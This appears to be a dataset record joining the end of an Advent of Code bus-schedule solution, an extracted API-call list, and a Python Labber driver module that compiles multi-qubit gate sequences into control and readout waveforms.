positions = [(k, int(v)) for k, v in enumerate(ids) if v != 'x']
lcm, time = 1, 0
for pos, bus in positions:
[time] = [x * lcm + time for x in range(bus) if (x * lcm + time + pos) % bus == 0]
lcm *= bus
return(time)
print(part1(earliest, ids))
print(part2(ids))
|
[
"aoc.data",
"math.ceil"
] |
[((76, 82), 'aoc.data', 'data', ([], {}), '()\n', (80, 82), False, 'from aoc import data\n'), ((252, 271), 'math.ceil', 'ceil', (['(earliest / id)'], {}), '(earliest / id)\n', (256, 271), False, 'from math import ceil\n')]
|
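part2 above is a sieve over the bus periods: keep a running timestamp and a step size equal to the product of the buses handled so far (they are pairwise coprime in the puzzle input), and for each new bus advance the timestamp in multiples of that step until the offset constraint (time + position) % bus == 0 holds. A worked check against the example schedule from the 2020 day 13 puzzle statement, run alongside the definitions above:

# Worked check of part2 on the example schedule from the puzzle statement.
example = [x if x == 'x' else int(x) for x in "7,13,x,x,59,x,31,19".split(',')]
assert part2(example) == 1068781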
#!/usr/bin/env python3
import logging
import numpy as np
import copy
import crosstalk
import gates
import predistortion
import pulses
import qubits
import readout
import tomography
# Allow logging to Labber's instrument log
log = logging.getLogger('LabberDriver')
# TODO Reduce calc of CZ by finding all unique TwoQubitGates in seq and calc.
# TODO Make I(width=None) have the width of the longest gate in the step
# TODO Add checks so that not both t0 and dt are given
# TODO Two composite gates should be able to be parallell
# TODO check number of qubits in seq and in gate added to seq
# TODO Remove pulse from I gates
class GateOnQubit:
def __init__(self, gate, qubit, pulse=None):
self.gate = gate
self.qubit = qubit
self.pulse = pulse
if pulse is None:
self.duration = 0
else:
self.duration = pulse.total_duration()
def __str__(self):
return "Gate {} on qubit {}".format(self.gate, self.qubit)
def __repr__(self):
return self.__str__()
class Step:
"""Represent one step in a sequence.
Parameters
----------
n_qubit : int
        Number of qubits in the sequence.
t0 : float
Center of the sequence in seconds (the default is None).
dt : float
Spacing to previous pulse in seconds (the default is None). Use only
either t0 or dt.
align : str {'left', 'center', 'right'}
The alignment of pulses if they have different lengths,
(the default is 'center').
Attributes
----------
    gates : list of :obj:`GateOnQubit`
The different gates in the step.
"""
def __init__(self, t0=None, dt=None, align='center'):
self.gates = []
self.align = align
self.t0 = t0
self.dt = dt
self.t_start = None
self.t_end = None
def add_gate(self, qubit, gate):
"""Add the given gate to the specified qubit(s).
The number of gates must equal the number of qubits.
        If the number of qubits given is less than the number of qubits in the
step, I gates are added to the other qubits.
Parameters
----------
qubit : int or list of int
The qubit indices.
gate : :obj:`BaseGate`
The gate(s).
"""
if gate.number_of_qubits() > 1 and not isinstance(qubit, list):
raise ValueError(
"Provide a list of qubits for gates with more than one qubit")
if gate.number_of_qubits() > 1 and not gate.number_of_qubits() == len(
qubit):
raise ValueError(
"""Number of qubits in the gate must equal the number of qubit
indices given""")
if gate.number_of_qubits() == 1 and not isinstance(qubit, int):
raise ValueError("Provide qubit as int for gates with one qubit")
if isinstance(qubit, int):
if self._qubit_in_step(qubit):
raise ValueError("Qubit {} already in step.".format(qubit))
else:
for n in qubit:
if self._qubit_in_step(n):
raise ValueError("Qubit {} already in step.".format(n))
self.gates.append(GateOnQubit(gate, qubit))
def time_shift(self, shift):
"""Shift the timings of the step.
Parameters
----------
shift : float
The amount of shift to apply in seconds.
"""
self.t_start += shift
self.t0 += shift
self.t_end += shift
def _qubit_in_step(self, qubit):
"""Returns whatever the given qubit is in the step or not. """
if not isinstance(qubit, int):
raise ValueError("Qubit index should be int.")
def _in(input_list, n):
flat_list = []
for sublist_or_el in input_list:
if isinstance(sublist_or_el, list):
if _in(sublist_or_el, n) is True:
return True
elif sublist_or_el == n:
return True
return False
return _in([x.qubit for x in self.gates], qubit)
def __str__(self):
return str(self.gates)
def __repr__(self):
return str(self.gates)
class Sequence:
"""A multi qubit seqence.
Parameters
----------
    n_qubit : int
The number of qubits in the sequence.
Attributes
----------
sequences : list of :obj:`Step`
Holds the steps of the sequence.
perform_process_tomography : bool
Flag for performing process tomography.
perform_state_tomography : bool
Flag for performing state tomography.
readout_delay : float
Delay time between last pulse and readout, in seconds.
n_qubit
"""
def __init__(self, n_qubit):
self.n_qubit = n_qubit
# log.info('initiating empty seqence list')
self.sequence_list = []
# process tomography
self.perform_process_tomography = False
self._process_tomography = tomography.ProcessTomography()
# state tomography
self.perform_state_tomography = False
self._state_tomography = tomography.StateTomography()
# readout
self.readout_delay = 0.0
# Public methods
def generate_sequence(self, config):
"""Generate sequence by adding gates/pulses to waveforms.
Parameters
----------
config : dict
Configuration as defined by Labber driver configuration window.
"""
raise NotImplementedError()
def get_sequence(self, config):
"""Compile sequence and return it.
Parameters
----------
config : dict
Labber instrument configuration.
Returns
-------
        :obj:`Sequence`
            The sequence itself, with its compiled list of steps.
"""
self.sequence_list = []
if self.perform_process_tomography:
self._process_tomography.add_pulses(self)
self.generate_sequence(config)
if self.perform_state_tomography:
self._state_tomography.add_pulses(self)
if self.readout_delay > 0:
delay = gates.IdentityGate(width=self.readout_delay)
self.add_gate_to_all(delay, dt=0)
self.add_gate_to_all(gates.ReadoutGate(), dt=0, align='left')
return self
# Public methods for adding pulses and gates to the sequence.
def add_single_pulse(self,
qubit,
pulse,
t0=None,
dt=None,
align_left=False):
"""Add single qubit pulse to specified qubit.
        This function still exists only to avoid breaking existing
        functionality. You should really use the add_gate method.
t0 or dt can be used to override the global pulse spacing.
Parameters
----------
qubit : int
Qubit number, indexed from 0.
pulse : :obj:`Pulse`
Definition of pulse to add.
t0 : float, optional
Absolute pulse position.
dt : float, optional
Pulse spacing, referenced to the previous pulse.
align_left: bool, optional
If True, aligns the pulse to the left. Defaults to False.
"""
gate = gates.CustomGate(pulse)
if align_left is True:
self.add_gate(qubit, gate, t0, dt, 'left')
else:
self.add_gate(qubit, gate, t0, dt, 'center')
def add_single_gate(self, qubit, gate, t0=None, dt=None, align_left=False):
"""Add single gate to specified qubit sequence.
        Note, this function still exists only to avoid breaking existing
        functionality. You should really use the add_gate method.
t0 or dt can be used to override the global pulse spacing.
Parameters
----------
qubit : int
Qubit number, indexed from 0.
gate : :obj:`Gate`
Definition of gate to add.
t0 : float, optional
Absolute pulse position.
dt : float, optional
Pulse spacing, referenced to the previous pulse.
align_left : boolean, optional
If True, t0 is the start of the pulse, otherwise it is the center
of the pulse. False is the default.
"""
if align_left is True:
self.add_gate(qubit, gate, t0, dt, 'left')
else:
self.add_gate(qubit, gate, t0, dt, 'center')
def add_gate(self,
qubit,
gate,
t0=None,
dt=None,
align='center',
index=None):
"""Add a set of gates to the given qubit sequences.
        For the qubits with no specified gate, an IdentityGate will be given.
The length of the step is given by the longest pulse.
Parameters
----------
qubit : int or list of int
The qubit(s) to add the gate(s) to.
gate : :obj:`BaseGate` or list of :obj:`BaseGate`
The gate(s) to add.
t0 : float, optional
Absolute gate position (the default is None).
dt : float, optional
Gate spacing, referenced to the previous pulse
(the default is None).
align : str, optional
            If two or more qubits have different pulse lengths, `align`
            specifies how those pulses should be aligned. 'left' aligns the
start, 'center' aligns the centers, and 'right' aligns the end,
(the default is 'center').
index : int, optional
Where in the sequence to insert the new gate.
"""
step = Step(t0=t0, dt=dt, align=align)
if isinstance(gate, list):
if not isinstance(qubit, list):
raise ValueError(
"""Provide qubit indices as a list when adding more than
one gate.""")
if len(gate) != len(qubit):
raise ValueError(
"Length of gate list must equal length of qubit list.")
for q, g in zip(qubit, gate):
step.add_gate(q, g)
else:
if gate.number_of_qubits() > 1:
if not isinstance(qubit, list):
raise ValueError(
"Provide qubit list for gates with more than one qubit"
)
else:
if not isinstance(qubit, int):
raise ValueError(
"For single gates, give qubit as int (not list).")
step.add_gate(qubit, gate)
# log.info('adding gate {} to {}. 2qb gate: {}'.format(gate, qubit, isinstance(gate, gates.TwoQubitGate)))
if index is None:
self.sequence_list.append(step)
# log.info('adding step to sequence list')
# log.info('sequence len is {}'.format(len(self.sequence_list)))
else:
self.sequence_list.insert(index + 1, step)
# log.info('inserting step in sequence list')
# log.info('sequence len is {}'.format(len(self.sequence_list)))
def add_gate_to_all(self, gate, t0=None, dt=None, align='center'):
"""Add a single gate to all qubits.
Pulses are added at the end of the sequence, with the gate spacing set
        by either the spacing parameter or the absolute position.
"""
if isinstance(gate, list):
raise ValueError("Only single gates allowed.")
if isinstance(gate, (gates.BaseGate, gates.CompositeGate)):
if gate.number_of_qubits() > 1:
raise ValueError(
"Not clear how to add multi-qubit gates to all qubits.")
qubit = list(range((self.n_qubit)))
gate = [gate for n in range(self.n_qubit)]
self.add_gate(qubit, gate, t0=t0, dt=dt, align=align)
def add_gates(self, gates):
"""Add multiple gates to the qubit waveform.
Pulses are added at the end of the sequence, with the gate spacing set
by the spacing parameter.
Examples
--------
Add three gates to a two-qubit sequence, first a positive pi-pulse
around X to qubit 1, then a negative pi/2-pulse to qubit 2, finally
simultaneous positive pi-pulses to qubits 1 and 2.
        >>> add_gates([[gates.Xp, None],
                       [None, gates.Y2m],
                       [gates.Xp, gates.Xp]])
Parameters
----------
gates : list of list of :obj:`BaseGate`
List of lists defining gates to add. The innermost list should
have the same length as number of qubits in the sequence.
"""
# make sure we have correct input
if not isinstance(gates, (list, tuple)):
raise Exception('The input must be a list of list with gates')
if len(gates) == 0:
return
if not isinstance(gates[0], (list, tuple)):
raise Exception('The input must be a list of list with gates')
# add gates sequence to waveforms
for gate in gates:
# add gate to specific qubit waveform
qubit = list(range(len(gate)))
self.add_gate(qubit, gate)
def set_parameters(self, config={}):
"""Set base parameters using config from from Labber driver.
Parameters
----------
config : dict
Configuration as defined by Labber driver configuration window
"""
# sequence parameters
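        # Map the qubit-count strings used in the Labber config ('Zero' ...
        # 'Nine') to integers.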
d = dict(
Zero=0,
One=1,
Two=2,
Three=3,
Four=4,
Five=5,
Six=6,
Seven=7,
Eight=8,
Nine=9)
# If the number of qubits changed, we need to re-init
if self.n_qubit != d[config.get('Number of qubits')]:
self.__init__(d[config.get('Number of qubits')])
# Readout
self.readout_delay = config.get('Readout delay')
# process tomography prepulses
self.perform_process_tomography = \
config.get('Generate process tomography prepulse', False)
self._process_tomography.set_parameters(config)
# state tomography
self.perform_state_tomography = config.get(
'Generate state tomography postpulse', False)
self._state_tomography.set_parameters(config)
class SequenceToWaveforms:
"""Compile a multi qubit sequence into waveforms.
Parameters
----------
    n_qubit : int
The maximum number of qubits.
Attributes
----------
dt : float
Pulse spacing, in seconds.
local_xy : bool
If False, collate all waveforms into one.
simultaneous_pulses : bool
        If False, separate all pulses in time.
sample_rate : float
AWG Sample rate.
n_pts : float
Number of points in the waveforms.
first_delay : float
Delay between start of waveform and start of the first pulse.
trim_to_sequence : bool
        If True, adjust `n_pts` to just fit the sequence.
align_to_end : bool
Align the whole sequence to the end of the waveforms.
Only relevant if `trim_to_sequence` is False.
sequences : list of :obj:`Step`
The qubit sequences.
qubits : list of :obj:`Qubit`
Parameters of each qubit.
wave_xy_delays : list of float
        Individual delays for the XY waveforms.
    wave_z_delays : list of float
        Individual delays for the Z waveforms.
n_qubit
"""
def __init__(self, n_qubit):
self.n_qubit = n_qubit
self.dt = 10E-9
self.local_xy = True
self.simultaneous_pulses = True
# waveform parameter
self.sample_rate = 1.2E9
self.n_pts = 240E3
self.first_delay = 100E-9
self.trim_to_sequence = True
self.align_to_end = False
self.sequence_list = []
self.qubits = [qubits.Qubit() for n in range(self.n_qubit)]
# waveforms
self._wave_xy = [
np.zeros(0, dtype=np.complex) for n in range(self.n_qubit)
]
# log.info('_wave_z initiated to 0s')
self._wave_z = [np.zeros(0) for n in range(self.n_qubit)]
self._wave_gate = [np.zeros(0) for n in range(self.n_qubit)]
# waveform delays
self.wave_xy_delays = np.zeros(self.n_qubit)
self.wave_z_delays = np.zeros(self.n_qubit)
# define pulses
self.pulses_1qb_xy = [None for n in range(self.n_qubit)]
self.pulses_1qb_z = [None for n in range(self.n_qubit)]
self.pulses_2qb = [None for n in range(self.n_qubit - 1)]
self.pulses_readout = [None for n in range(self.n_qubit)]
# cross-talk
self.compensate_crosstalk = False
self._crosstalk = crosstalk.Crosstalk()
# predistortion
self.perform_predistortion = False
self._predistortions = [
predistortion.Predistortion(n) for n in range(self.n_qubit)
]
self._predistortions_z = [
predistortion.ExponentialPredistortion(n)
for n in range(self.n_qubit)
]
# gate switch waveform
self.generate_gate_switch = False
self.uniform_gate = False
self.gate_delay = 0.0
self.gate_overlap = 20E-9
self.minimal_gate_time = 20E-9
# filters
self.use_gate_filter = False
self.use_z_filter = False
# readout trig settings
self.readout_trig_generate = False
# readout wave object and settings
self.readout = readout.Demodulation(self.n_qubit)
self.readout_trig = np.array([], dtype=float)
self.readout_iq = np.array([], dtype=np.complex)
def get_waveforms(self, sequence):
"""Compile the given sequence into waveforms.
Parameters
----------
        sequence : :obj:`Sequence`
            The qubit sequence to be compiled.
        Returns
        -------
        dict
            The compiled waveforms, with keys 'xy', 'z', 'gate',
            'readout_trig' and 'readout_iq'.
"""
self.sequence = sequence
self.sequence_list = sequence.sequence_list
# log.info('Start of get_waveforms. Len sequence list: {}'.format(len(self.sequence_list)))
# log.info('Point 1: Sequence_list[3].gates = {}'.format(self.sequence_list[3].gates))
if not self.simultaneous_pulses:
self._seperate_gates()
# log.info('Point 2: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._explode_composite_gates()
# log.info('Point 3: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._add_pulses_and_durations()
# log.info('Point 4: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._add_timings()
# log.info('Point 5: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._init_waveforms()
# log.info('Point 6: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
if self.align_to_end:
shift = self._round((self.n_pts - 2) / self.sample_rate -
self.sequence_list[-1].t_end)
for step in self.sequence_list:
step.time_shift(shift)
self._perform_virtual_z()
self._generate_waveforms()
# collapse all xy pulses to one waveform if no local XY control
if not self.local_xy:
# sum all waveforms to first one
self._wave_xy[0] = np.sum(self._wave_xy[:self.n_qubit], 0)
# clear other waveforms
for n in range(1, self.n_qubit):
self._wave_xy[n][:] = 0.0
# log.info('before predistortion, _wave_z max is {}'.format(np.max(self._wave_z)))
# if self.compensate_crosstalk:
# self._perform_crosstalk_compensation()
if self.perform_predistortion:
self._predistort_xy_waveforms()
if self.perform_predistortion_z:
self._predistort_z_waveforms()
if self.readout_trig_generate:
self._add_readout_trig()
if self.generate_gate_switch:
self._add_microwave_gate()
self._filter_output_waveforms()
# Apply offsets
self.readout_iq += self.readout_i_offset + 1j * self.readout_q_offset
# create and return dictionary with waveforms
waveforms = dict()
waveforms['xy'] = self._wave_xy
waveforms['z'] = self._wave_z
waveforms['gate'] = self._wave_gate
waveforms['readout_trig'] = self.readout_trig
waveforms['readout_iq'] = self.readout_iq
# log.info('returning z waveforms in get_waveforms. Max is {}'.format(np.max(waveforms['z'])))
return waveforms
def _seperate_gates(self):
new_sequences = []
for step in self.sequence_list:
if any(
isinstance(gate, (gates.ReadoutGate, gates.IdentityGate))
for gate in step.gates):
                # Don't separate I gates or readouts since we do
# multiplexed readout
new_sequences.append(step)
continue
for gate in step.gates:
# log.info('In seperate gates, handling gate {}'.format(gate))
if gate.gate is not None:
new_step = Step(
t0=step.t_start, dt=step.dt, align=step.align)
new_step.add_gate(gate.qubit, gate.gate)
new_sequences.append(new_step)
# log.info('New sequence [6] is {}'.format(new_sequences[6].gates))
self.sequence_list = new_sequences
def _add_timings(self):
t_start = 0
for step in self.sequence_list:
if step.dt is None and step.t0 is None:
# Use global pulse spacing
step.dt = self.dt
# Find longest gate in sequence
max_duration = np.max([x.duration for x in step.gates])
if step.t0 is None:
step.t_start = self._round(t_start + step.dt)
step.t0 = self._round(step.t_start + max_duration / 2)
else:
step.t_start = self._round(step.t0 - max_duration / 2)
step.t_end = self._round(step.t_start + max_duration)
t_start = step.t_end # Next step starts where this one ends
# Avoid double spacing for steps with 0 duration
if max_duration == 0:
t_start = t_start - step.dt
# Make sure that the sequence is sorted chronologically.
# self.sequence_list.sort(key=lambda x: x.t_start) # TODO Fix this
        # Make sure that sequence starts on first delay
time_diff = self._round(self.first_delay -
self.sequence_list[0].t_start)
for step in self.sequence_list:
step.time_shift(time_diff)
def _add_pulses_and_durations(self):
for step in self.sequence_list:
for gate in step.gates:
if gate.pulse is None:
gate.pulse = self._get_pulse_for_gate(gate)
if gate.pulse is None:
gate.duration = 0
else:
gate.duration = gate.pulse.total_duration()
def _get_pulse_for_gate(self, gate):
qubit = gate.qubit
gate = gate.gate
# Virtual Z is special since it has no length
if isinstance(gate, gates.VirtualZGate):
pulse = None
# Get the corresponding pulse for other gates
elif isinstance(gate, gates.SingleQubitXYRotation):
pulse = gate.get_adjusted_pulse(self.pulses_1qb_xy[qubit])
elif isinstance(gate, gates.SingleQubitZRotation):
pulse = gate.get_adjusted_pulse(self.pulses_1qb_z[qubit])
elif isinstance(gate, gates.IdentityGate):
pulse = gate.get_adjusted_pulse(self.pulses_1qb_xy[qubit])
elif isinstance(gate, gates.TwoQubitGate):
pulse = gate.get_adjusted_pulse(self.pulses_2qb[qubit[0]])
elif isinstance(gate, gates.ReadoutGate):
pulse = gate.get_adjusted_pulse(self.pulses_readout[qubit])
elif isinstance(gate, gates.CustomGate):
pulse = gate.get_adjusted_pulse(gate.pulse)
else:
raise ValueError('Please provide a pulse for {}'.format(gate))
return pulse
def _predistort_xy_waveforms(self):
"""Pre-distort the waveforms."""
# go through and predistort all xy waveforms
n_wave = self.n_qubit if self.local_xy else 1
for n in range(n_wave):
self._wave_xy[n] = self._predistortions[n].predistort(
self._wave_xy[n])
def _predistort_z_waveforms(self):
# go through and predistort all waveforms
for n in range(self.n_qubit):
self._wave_z[n] = self._predistortions_z[n].predistort(
self._wave_z[n])
def _perform_crosstalk_compensation(self):
"""Compensate for Z-control crosstalk."""
self._wave_z = self._crosstalk.compensate(self._wave_z)
def _explode_composite_gates(self):
# Loop through the sequence until all CompositeGates are removed
# Note that there could be nested CompositeGates
n = 0
while n < len(self.sequence_list):
step = self.sequence_list[n]
i = 0
while i < len(step.gates):
gate = step.gates[i]
if isinstance(gate.gate, gates.CompositeGate):
# # log.info('In exploded composite, handling composite gate {} at step {}'.format(gate, n))
for m, g in enumerate(gate.gate.sequence):
new_gate = [x.gate for x in g.gates]
# Single gates shouldn't be lists
if len(new_gate) == 1:
new_gate = new_gate[0]
# Translate gate qubit number to device qubit number
new_qubit = [x.qubit for x in g.gates]
for j, q in enumerate(new_qubit):
if isinstance(q, int):
if isinstance(gate.qubit, int):
new_qubit[j] = gate.qubit
continue
new_qubit[j] = gate.qubit[q]
else:
new_qubit[j] = []
for k in q:
new_qubit[j].append(gate.qubit[k])
# Single qubit shouldn't be lists
if len(new_qubit) == 1:
new_qubit = new_qubit[0]
# # log.info('In explode composite; modifying {} by adding gate {} at index {}'.format(gate, new_gate, n+m))
self.sequence.add_gate(
new_qubit, new_gate, index=n + m)
del step.gates[i]
# # log.info('In composite gates, removing step {}', i)
continue
i = i + 1
n = n + 1
# Remove any empty steps where the composite gates were
i = 0
while i < len(self.sequence_list):
step = self.sequence_list[i]
if len(step.gates) == 0:
del self.sequence_list[i]
# log.info('In composite gates, removing step {}', i)
continue
i = i + 1
# for i, step in enumerate(self.sequence_list):
# log.info('At end of explode, step {} is {}'.format(i, step.gates))
def _perform_virtual_z(self):
"""Shifts the phase of pulses subsequent to virtual z gates."""
for qubit in range(self.n_qubit):
phase = 0
for step in self.sequence_list:
for gate in step.gates:
gate_obj = None
if qubit == gate.qubit: # TODO Allow for 2 qb
gate_obj = gate.gate
if isinstance(gate_obj, gates.VirtualZGate):
phase += gate_obj.theta
continue
if (isinstance(gate_obj, gates.SingleQubitXYRotation)
and phase != 0):
gate.gate = copy.copy(gate_obj)
gate.gate.phi += phase
                            # Need to recompute the pulse
gate.pulse = self._get_pulse_for_gate(gate)
def _add_microwave_gate(self):
"""Create waveform for gating microwave switch."""
n_wave = self.n_qubit if self.local_xy else 1
# go through all waveforms
for n, wave in enumerate(self._wave_xy[:n_wave]):
if self.uniform_gate:
# the uniform gate is all ones
gate = np.ones_like(wave)
# if creating readout trig, turn off gate during readout
if self.readout_trig_generate:
gate[-int((self.readout_trig_duration - self.gate_overlap -
self.gate_delay) * self.sample_rate):] = 0.0
else:
# non-uniform gate, find non-zero elements
gate = np.array(np.abs(wave) > 0.0, dtype=float)
# fix gate overlap
n_overlap = int(np.round(self.gate_overlap * self.sample_rate))
diff_gate = np.diff(gate)
indx_up = np.nonzero(diff_gate > 0.0)[0]
indx_down = np.nonzero(diff_gate < 0.0)[0]
# add extra elements to left and right for overlap
for indx in indx_up:
gate[max(0, indx - n_overlap):(indx + 1)] = 1.0
for indx in indx_down:
gate[indx:(indx + n_overlap + 1)] = 1.0
# fix gaps in gate shorter than min (look for 1>0)
diff_gate = np.diff(gate)
indx_up = np.nonzero(diff_gate > 0.0)[0]
indx_down = np.nonzero(diff_gate < 0.0)[0]
# ignore first transition if starting in zero
if gate[0] == 0:
indx_up = indx_up[1:]
n_down_up = min(len(indx_down), len(indx_up))
len_down = indx_up[:n_down_up] - indx_down[:n_down_up]
# find short gaps
short_gaps = np.nonzero(
len_down < (self.minimal_gate_time * self.sample_rate))[0]
for indx in short_gaps:
gate[indx_down[indx]:(1 + indx_up[indx])] = 1.0
# shift gate in time
n_shift = int(np.round(self.gate_delay * self.sample_rate))
if n_shift < 0:
n_shift = abs(n_shift)
gate = np.r_[gate[n_shift:], np.zeros((n_shift, ))]
elif n_shift > 0:
gate = np.r_[np.zeros((n_shift, )), gate[:(-n_shift)]]
# make sure gate starts/ends in 0
gate[0] = 0.0
gate[-1] = 0.0
# store results
self._wave_gate[n] = gate
def _filter_output_waveforms(self):
"""Filter output waveforms"""
# start with gate
if self.use_gate_filter and self.gate_filter_size > 1:
# prepare filter
window = self._get_filter_window(
self.gate_filter_size, self.gate_filter,
self.gate_filter_kaiser_beta)
# apply filter to all output waveforms
n_wave = self.n_qubit if self.local_xy else 1
for n in range(n_wave):
self._wave_gate[n] = self._apply_window_filter(
self._wave_gate[n], window)
# make sure gate starts/ends in 0
self._wave_gate[n][0] = 0.0
self._wave_gate[n][-1] = 0.0
# same for z waveforms
if self.use_z_filter and self.z_filter_size > 1:
# prepare filter
window = self._get_filter_window(
self.z_filter_size, self.z_filter, self.z_filter_kaiser_beta)
# apply filter to all output waveforms
for n in range(self.n_qubit):
self._wave_z[n] = self._apply_window_filter(
self._wave_z[n], window)
def _get_filter_window(self, size=11, window='Kaiser', kaiser_beta=14.0):
"""Get filter for waveform convolution"""
if window == 'Rectangular':
w = np.ones(size)
elif window == 'Bartlett':
# for filters that start/end in zeros, add 2 points and truncate
w = np.bartlett(max(1, size+2))
w = w[1:-1]
elif window == 'Blackman':
w = np.blackman(size + 2)
w = w[1:-1]
elif window == 'Hamming':
w = np.hamming(size)
elif window == 'Hanning':
w = np.hanning(size + 2)
w = w[1:-1]
elif window == 'Kaiser':
w = np.kaiser(size, kaiser_beta)
else:
            raise ValueError('Unknown filter window function %s.' % str(window))
return w/w.sum()
def _apply_window_filter(self, x, window):
"""Apply window filter to input waveform
Parameters
----------
x: np.array
Input waveform.
window: np.array
Filter waveform.
Returns
-------
np.array
Filtered waveform.
"""
# buffer waveform to avoid wrapping effects at boundaries
n = len(window)
s = np.r_[2*x[0] - x[n-1::-1], x, 2*x[-1] - x[-1:-n:-1]]
# apply convolution
y = np.convolve(s, window, mode='same')
return y[n:-n+1]
def _round(self, t, acc=1E-12):
"""Round the time `t` with a certain accuarcy `acc`.
Parameters
----------
t : float
The time to be rounded.
acc : float
            The accuracy (the default is 1E-12).
Returns
-------
float
The rounded time.
"""
return int(np.round(t / acc)) * acc
def _add_readout_trig(self):
"""Create waveform for readout trigger."""
trig = np.zeros_like(self.readout_iq)
start = (np.abs(self.readout_iq) > 0.0).nonzero()[0][0]
end = int(
np.min((start + self.readout_trig_duration * self.sample_rate,
self.n_pts_readout)))
trig[start:end] = self.readout_trig_amplitude
# make sure trig starts and ends in 0.
trig[0] = 0.0
trig[-1] = 0.0
self.readout_trig = trig
def _init_waveforms(self):
"""Initialize waveforms according to sequence settings."""
# To keep the first pulse delay, use the smallest delay as reference.
min_delay = np.min([
self.wave_xy_delays[:self.n_qubit],
self.wave_z_delays[:self.n_qubit]
])
self.wave_xy_delays -= min_delay
self.wave_z_delays -= min_delay
max_delay = np.max([
self.wave_xy_delays[:self.n_qubit],
self.wave_z_delays[:self.n_qubit]
])
# find the end of the sequence
# only include readout in size estimate if all waveforms have same size
if self.readout_match_main_size:
if len(self.sequence_list) == 0:
end = max_delay
else:
end = np.max(
[s.t_end for s in self.sequence_list]) + max_delay
else:
if len(self.sequence_list) <= 1:
end = max_delay
else:
end = np.max(
[s.t_end for s in self.sequence_list[0:-1]]) + max_delay
# create empty waveforms of the correct size
if self.trim_to_sequence:
self.n_pts = int(np.ceil(end * self.sample_rate)) + 1
if self.n_pts % 2 == 1:
# Odd n_pts give spectral leakage in FFT
self.n_pts += 1
for n in range(self.n_qubit):
self._wave_xy[n] = np.zeros(self.n_pts, dtype=np.complex)
# log.info('wave z {} initiated to 0'.format(n))
self._wave_z[n] = np.zeros(self.n_pts, dtype=float)
self._wave_gate[n] = np.zeros(self.n_pts, dtype=float)
# Waveform time vector
self.t = np.arange(self.n_pts) / self.sample_rate
# readout trig and i/q waveforms
if self.readout_match_main_size:
# same number of points for readout and main waveform
self.n_pts_readout = self.n_pts
else:
# different number of points for readout and main waveform
self.n_pts_readout = 1 + int(
np.ceil(self.sample_rate * (self.sequence_list[-1].t_end -
self.sequence_list[-1].t_start)))
if self.n_pts_readout % 2 == 1:
# Odd n_pts give spectral leakage in FFT
self.n_pts_readout += 1
self.readout_trig = np.zeros(self.n_pts_readout, dtype=float)
self.readout_iq = np.zeros(self.n_pts_readout, dtype=np.complex)
def _generate_waveforms(self):
"""Generate the waveforms corresponding to the sequence."""
# log.info('generating waveform from sequence. Len is {}'.format(len(self.sequence_list)))
for step in self.sequence_list:
# log.info('Generating gates {}'.format(step.gates))
for gate in step.gates:
qubit = gate.qubit
if isinstance(qubit, list):
qubit = qubit[0]
gate_obj = gate.gate
if isinstance(gate_obj,
(gates.IdentityGate, gates.VirtualZGate)):
continue
elif isinstance(gate_obj, gates.SingleQubitZRotation):
waveform = self._wave_z[qubit]
delay = self.wave_z_delays[qubit]
if self.compensate_crosstalk:
crosstalk = self._crosstalk.compensation_matrix[:,
qubit]
elif isinstance(gate_obj, gates.TwoQubitGate):
# log.info('adding 2qb gate waveforms')
waveform = self._wave_z[qubit]
delay = self.wave_z_delays[qubit]
if self.compensate_crosstalk:
crosstalk = self._crosstalk.compensation_matrix[:,
qubit]
elif isinstance(gate_obj, gates.SingleQubitXYRotation):
waveform = self._wave_xy[qubit]
delay = self.wave_xy_delays[qubit]
elif isinstance(gate_obj, gates.ReadoutGate):
waveform = self.readout_iq
delay = 0
else:
raise ValueError(
"Don't know which waveform to add {} to.".format(
gate_obj))
# get the range of indices in use
if (isinstance(gate_obj, gates.ReadoutGate)
and not self.readout_match_main_size):
# special case for readout if not matching main wave size
start = 0.0
end = self._round(step.t_end - step.t_start)
else:
start = self._round(step.t_start + delay)
end = self._round(step.t_end + delay)
if (self.compensate_crosstalk and
isinstance(gate_obj,
(gates.SingleQubitZRotation,
gates.TwoQubitGate))):
for q in range(self.n_qubit):
waveform = self._wave_z[q]
delay = self.wave_z_delays[q]
start = self._round(step.t_start + delay)
end = self._round(step.t_end + delay)
indices = np.arange(
max(np.floor(start * self.sample_rate), 0),
min(
np.ceil(end * self.sample_rate),
len(waveform)),
dtype=int)
# return directly if no indices
if len(indices) == 0:
continue
# calculate time values for the pulse indices
t = indices / self.sample_rate
max_duration = end - start
middle = end - max_duration / 2
if step.align == 'center':
t0 = middle
elif step.align == 'left':
t0 = middle - (max_duration - gate.duration) / 2
elif step.align == 'right':
t0 = middle + (max_duration - gate.duration) / 2
scaling_factor = float(crosstalk[q, 0])
if q != qubit:
scaling_factor = -scaling_factor
waveform[indices] += (
scaling_factor
* gate.pulse.calculate_waveform(t0, t))
else:
# calculate the pulse waveform for the selected indices
indices = np.arange(
max(np.floor(start * self.sample_rate), 0),
min(np.ceil(end * self.sample_rate), len(waveform)),
dtype=int)
# return directly if no indices
if len(indices) == 0:
continue
# calculate time values for the pulse indices
t = indices / self.sample_rate
max_duration = end - start
middle = end - max_duration / 2
if step.align == 'center':
t0 = middle
elif step.align == 'left':
t0 = middle - (max_duration - gate.duration) / 2
elif step.align == 'right':
t0 = middle + (max_duration - gate.duration) / 2
waveform[indices] += gate.pulse.calculate_waveform(t0, t)
def set_parameters(self, config={}):
"""Set base parameters using config from from Labber driver.
Parameters
----------
config : dict
Configuration as defined by Labber driver configuration window
"""
# sequence parameters
d = dict(
Zero=0,
One=1,
Two=2,
Three=3,
Four=4,
Five=5,
Six=6,
Seven=7,
Eight=8,
Nine=9)
# If the number of qubits changed, re-init to update pulses etc
if self.n_qubit != d[config.get('Number of qubits')]:
self.__init__(d[config.get('Number of qubits')])
self.dt = config.get('Pulse spacing')
self.local_xy = config.get('Local XY control')
# default for simultaneous pulses is true, only option for benchmarking
self.simultaneous_pulses = config.get('Simultaneous pulses', True)
# waveform parameters
self.sample_rate = config.get('Sample rate')
self.n_pts = int(config.get('Number of points', 0))
self.first_delay = config.get('First pulse delay')
self.trim_to_sequence = config.get('Trim waveform to sequence')
self.trim_start = config.get('Trim both start and end')
self.align_to_end = config.get('Align pulses to end of waveform')
# qubit spectra
for n in range(self.n_qubit):
m = n + 1 # pulses are indexed from 1 in Labber
qubit = qubits.Transmon(
config.get('f01 max #{}'.format(m)),
config.get('f01 min #{}'.format(m)),
